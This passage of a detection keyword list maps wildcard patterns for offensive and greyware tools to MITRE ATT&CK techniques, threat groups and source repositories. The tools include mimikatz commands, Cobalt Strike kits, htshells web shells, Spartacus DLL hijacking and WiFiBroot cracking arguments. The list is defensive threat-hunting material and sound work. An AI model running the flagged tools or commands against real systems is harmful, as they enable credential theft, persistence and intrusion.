-*misc::spooler*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::taskmgr*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::wp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::xor*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*miscbackdoorlnkhelp*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*missile-command.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mitm6 --*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*mitm6 -d *,offensive_tool_keyword,mitm6,performs MiTM for IPv6,T1547 - T1557 - T1569 - T1562 - T1573,TA0002 - TA0003 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/fox-it/mitm6,1,1,N/A,N/A,10,1478,229,2022-07-05T09:47:15Z,2018-01-10T21:27:28Z -*mitm6.py*,offensive_tool_keyword,mitm6,performs MiTM for IPv6,T1547 - T1557 - T1569 - T1562 - T1573,TA0002 - TA0003 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/fox-it/mitm6,1,1,N/A,N/A,10,1478,229,2022-07-05T09:47:15Z,2018-01-10T21:27:28Z -*mitmdump -*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*mitmdump -s aerosol.py*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*MITMf.py*,offensive_tool_keyword,MITMf,Framework for Man-In-The-Middle attacks,T1557 - T1192 - T1173 - T1185,TA0001 - TA0011 - TA0040,N/A,N/A,Sniffing & Spoofing,https://github.com/byt3bl33d3r/MITMf,1,1,N/A,N/A,10,3480,1090,2018-08-28T15:44:25Z,2014-07-07T11:13:51Z -*mitmproxy*,offensive_tool_keyword,mitmproxy,An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface,T1557 - T1553 - T1003 - T1556 - T1563,TA0002 - TA0009 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/mitmproxy/mitmproxy,1,1,N/A,N/A,10,32405,3799,2023-10-02T22:25:26Z,2010-02-16T04:10:13Z -*mitmsocks*,offensive_tool_keyword,mitmsocks4j,Man-in-the-middle SOCKS Proxy,T1557 - T1563 - T1559 - T1588,TA0007 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/Akdeniz/mitmsocks4j,1,0,N/A,N/A,1,30,9,2013-02-14T20:42:37Z,2013-02-10T21:33:52Z -*mitmsocks4j*,offensive_tool_keyword,mitmsocks4j,Man-in-the-middle SOCKS Proxy for Java,T1557 - T1563 - T1559 - T1588,TA0007 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/Akdeniz/mitmsocks4j,1,1,N/A,N/A,1,30,9,2013-02-14T20:42:37Z,2013-02-10T21:33:52Z -*mjnbclmflcpookeapghfhapeffmpodij*,greyware_tool_keyword,Ultrareach VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*mjolnodfokkkaichkcjipfgblbfgojpa*,greyware_tool_keyword,DotVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Mobile-Security-Framework*,offensive_tool_keyword,Mobile-Security-Framework,Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.,T1564 - T1592 - T1547 - T1562,TA0010 - TA0011 - TA0003 - TA0008,N/A,N/A,Frameworks,https://github.com/MobSF/Mobile-Security-Framework-MobSF,1,0,N/A,N/A,10,14942,3006,2023-10-03T20:48:09Z,2015-01-31T04:36:01Z -*Mobile-Security-Framework*,offensive_tool_keyword,Mobile-Security-Framework-MobSF,Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.,T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523,TA0007 - TA0010 - TA0003,N/A,N/A,Frameworks,https://github.com/MobSF/Mobile-Security-Framework-MobSF,1,1,N/A,N/A,10,14942,3006,2023-10-03T20:48:09Z,2015-01-31T04:36:01Z -*MockDirUACBypass*,offensive_tool_keyword,MockDirUACBypass,Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.,T1574.002 - T1547.008 - T1059.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*MockDirUACBypassDll*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*Mockingjay_BOF.sln*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,1,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*Mockingjay_BOF-main*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,1,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*mod_auth_remote.phish.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_buster.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*mod_caucho.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_cgi.shell.bash.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_cgi.shell.bind.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_cgi.shell.windows.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_mono.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_multi.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_nikto.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*mod_perl.embperl.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_perl.IPP.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_perl.Mason.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_perl.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_php.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_php.shell2.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_php.stealth-shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_python.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_rivet.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_ruby.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_sendmail.rce.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_shellshock.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*mod_wp_enum.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*modDetective*,offensive_tool_keyword,modDetective,modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in red team engagements and CTFs in order to pinpoint where escalation and attack vectors may exist. This is especially true in CTFs. in which files associated with the challenges often have a much newer modification date than standard files that exist from install.,T1003 - T1036 - T1057,TA0005 - TA0007,N/A,N/A,Exploitation tools,https://github.com/itsKindred/modDetective,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*--mode 3 --type handshake --essid * --verbose -d dicts/* --read *.cap*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,0,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*--mode 3 --type pmkid --verbose -d dicts/* --read *.txt*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,0,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*--mode com --acl --csv *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*--mode com --procmon *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*--mode dll --existing --pml *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*--mode dll --procmon *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*--mode proxy --action prototypes --path *prototypes.csv*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*--mode proxy --dll *.dll*--external-resources*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*--mode proxy --ghidra *--dll *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*ModifiedVulnerableBinaryFormatters\info.txt*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*Modlishka/config*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*MODLISHKA_BIN*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,0,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*Modlishka-linux-amd64*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*Modlishka-windows-*-amd64.exe*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*modprobe -r*,greyware_tool_keyword,modproble,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*modprobe --remove*,greyware_tool_keyword,modproble,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*modprobe rmmod -r*,greyware_tool_keyword,modproble,Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.,T1547.006 - T1070.006,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*module inject *,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,0,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*modules*daclread.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*modules/enumrate.py*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*modules/exploits/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*modules/exploits/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*mogwailabs*,offensive_tool_keyword,Github Username,MOGWAI LABS is an infosec boutique with a strong emphasis on offensive security github repo 